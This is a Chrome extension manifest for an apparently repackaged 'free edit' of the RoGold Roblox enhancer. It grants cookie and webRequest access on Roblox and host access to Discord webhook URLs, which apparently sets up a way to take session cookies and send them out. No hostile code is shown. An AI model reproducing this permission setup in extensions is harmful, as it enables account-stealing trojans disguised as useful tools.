{
  "update_url": "https://clients2.google.com/service/update2/crx",
  "name": "RoGold - Level Up Roblox(FREE)",
  "description": "__MSG_appDesc__",
  "default_locale": "en",
  "author": "alexop free edit by: MK",
  "version": "1.4.5",
  "manifest_version": 3,
  "background": {
    "service_worker": "background.js"
  },
  "web_accessible_resources": [
    {
      "resources": ["init.js", "/svg/*", "/images/*", "/css/*", "/retrieveGlobal.js", "/useAngular.js", "/icons/*"],
      "matches": ["*://*/*"]
    }
  ],
  "content_scripts": [
    {
      "matches": ["*://www.roblox.com/*", "*://web.roblox.com/*"],
      "js": ["/libraries/!util.js", "/libraries/ByteReader.js", "/libraries/RBXM/Binary.js", "/libraries/RBXM/LZ4.js", "/libraries/RBXM/RBXMReader.js", "/libraries/RBXM/Stream.js", "/libraries/RBXM/xml.js", "/libraries/currencies.js", "/libraries/jquery-3.5.1.min.js", "/libraries/jquery-ui-1.12.1.js", "/libraries/luaparse.js", "/libraries/lzma_worker-min.js", "/libraries/modal.js", "/libraries/pager.js", "/libraries/resemble.js", "all.js", "develop.js", "library.js", "outfitcopy.js", "upload.js", "discover.js", "game.js", "joinlink.js", "catalog.js", "group.js", "home.js", "inventory.js", "search.js", "settings.js", "avatar.js", "banned.js", "friends.js", "messages.js", "profile.js", "retrieveGlobal.js", "useAngular.js", "inject.js"],
      "css": ["/css/all.css", "css/slider.css"],
      "run_at": "document_start",
      "all_frames": true
    }
  ],
  "action": {
    "default_icon": "icons/grey.png",
    "default_popup": "popup/popup.html"
  },
  "icons": {
    "16": "icons/grey_16x16.png",
    "48": "icons/grey_48x48.png",
    "128": "icons/grey_128x128.png"
  },
  "permissions": [
    "storage",
    "contextMenus",
    "clipboardWrite",
    "notifications",
    "cookies",
    "webRequest",
    "https://www.roblox.com/*"
  ],
  "host_permissions": [
    "*://*.roblox.com/*",
    "*://*.rbxcdn.com/*",
    "https://discord.com/api/webhooks/*"
  ],
  "short_name": "RoGold",
  "incognito": "split"
}